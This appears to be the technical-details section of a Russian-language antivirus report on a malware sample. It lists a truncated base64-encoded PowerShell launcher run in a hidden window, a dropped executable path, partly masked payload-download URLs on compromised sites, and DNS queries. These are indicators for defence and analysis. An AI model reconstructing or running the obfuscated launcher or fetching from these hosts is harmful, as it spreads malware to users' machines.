Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -ENCOD JABFADUAZQA4AG0AcAA4AD0AKAAoACcAUQB2ACcAKwAnAHIAJwApACsAKAAnADkAZwAnACsAJwBxAGcAJwApACkAOwAmACgAJwBuAGUAJwArACcAdwAtACcAKwAnAGkAdABlAG0AJwApACAAJABFAE4AVgA6AFUAcwBFAFIAUA...
- %HOMEPATH%\exyas68\x_xe08_\qicxrezc.exe
- %HOMEPATH%\exyas68\x_xe08_\qicxrezc.exe
- %HOMEPATH%\exyas68\x_xe08_\qicxrezc.exe
- http://h2##.com/uf8vu/U/
- http://www.al###aaseb.com/wp-includes/P/
- http://www.al###aaseb.com/pacan-so-tatuirovkoj-nate-osobe-ne-byl-v-silah/
- http://th#####onsultant.com/wp-includes/t/
- http://ca###arai.com/icon/D/
- http://bu#.#####ahuamediaprojects.com/wp-includes/u/
- http://ph####x.2xxhub.com/wp-content/esp/5ur8drbma/6qH/
- DNS ASK h2##.com
- DNS ASK al###aaseb.com
- DNS ASK th#####onsultant.com
- DNS ASK ca###arai.com
- DNS ASK bu#.#####ahuamediaprojects.com
- DNS ASK ae##.#ev.caveim.net
- DNS ASK ph####x.2xxhub.com
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -ENCOD JABFADUAZQA4AG0AcAA4AD0AKAAoACcAUQB2ACcAKwAnAHIAJwApACsAKAAnADkAZwAnACsAJwBxAGcAJwApACkAOwAmACgAJwBuAGUAJwArACcAdwAtACcAKwAnAGkAdABlAG0AJwApACAAJABFAE4AVgA6AFUAcwBFAFIAUA...' (со скрытым окном)